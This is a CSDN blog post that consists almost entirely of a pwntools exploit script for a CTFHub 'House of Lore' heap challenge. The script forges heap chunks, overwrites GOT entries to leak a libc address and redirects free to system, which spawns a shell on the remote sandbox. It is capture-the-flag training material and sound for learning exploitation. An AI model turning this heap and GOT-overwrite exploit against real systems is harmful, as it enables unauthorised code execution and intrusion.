[CTFHub-技能树]--House of Lore

于 2023-02-10 14:22:03 发布
阅读量144 收藏
点赞数
分类专栏: 网络安全 PWN 文章标签: 网络 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128969408
版权 
from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",26124)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

def add(size):
	ru(b"Your choice >> \n")
	sl(b"1")
	ru(b"size:\n")
	sl(str(size))

def edit(idx,data):
	ru(b"Your choice >> \n")
	sl(b"2")
	ru(b"Which page do you want to edit?")
	sl(str(idx))
	ru(b"Input your content:")
	s(data)

def free(idx):
	ru(b"Your choice >> \n")
	sl(b"3")
	ru(b"Which page do you want to delete?")
	sl(str(idx))


def name(data):
	ru(b"Your choice >> \n")
	sl(b"4")
	ru(b"Your new name:")
	s(data)

def message(size,data1,data2):
	ru(b"Your choice >> \n")
	sl(b"5")
	global chunk_0
	ru(b"Your message is saved at ")
	chunk_0 = int(r(9),16)
	print("message_chunk---------------->: ",hex(chunk_0))
	ru(b"Your size of new message:")
	sl(str(size))
	ru(b'Input your new message:')
	s(data1)
	ru(b"Oh,I'm sorry,maybe you should say goodbye to the old message:")
	s(p64(name_addr-0x10)+p64(name_addr-0x10))

ru(b"Now,please input your name,Mr. writer:")
sl(b"aaaa")
ru(b"And write some message for your book?")
sl(b"bbbb")

add(0x80)
# add(0x90)
# add(0x80)
# free(1)
# add(0xa0)

page_list = 0x602100
message_addr = 0x6020E0
name_addr =0x6020A0 

message(0xee,b"a",b"\x28")
name(p64(chunk_0-0x10)*2)
add(0xb0)
add(0xb0)

free_got = elf.got['free']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

payload = b"a"*0x60+p64(free_got)+p64(puts_got)
edit(2,payload)
edit(0,p64(puts_plt))
free(1)
ru(b"\n")
puts_addr = uu64(r(6))
libc_base = puts_addr-libc.sym['puts']
system_addr = libc_base+libc.sym['system']
print("libc_base-------------->: ",hex(libc_base))

edit(0,p64(system_addr))
edit(2,b"/bin/sh\x00")
free(2)


# gdb.attach(io)

itr()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值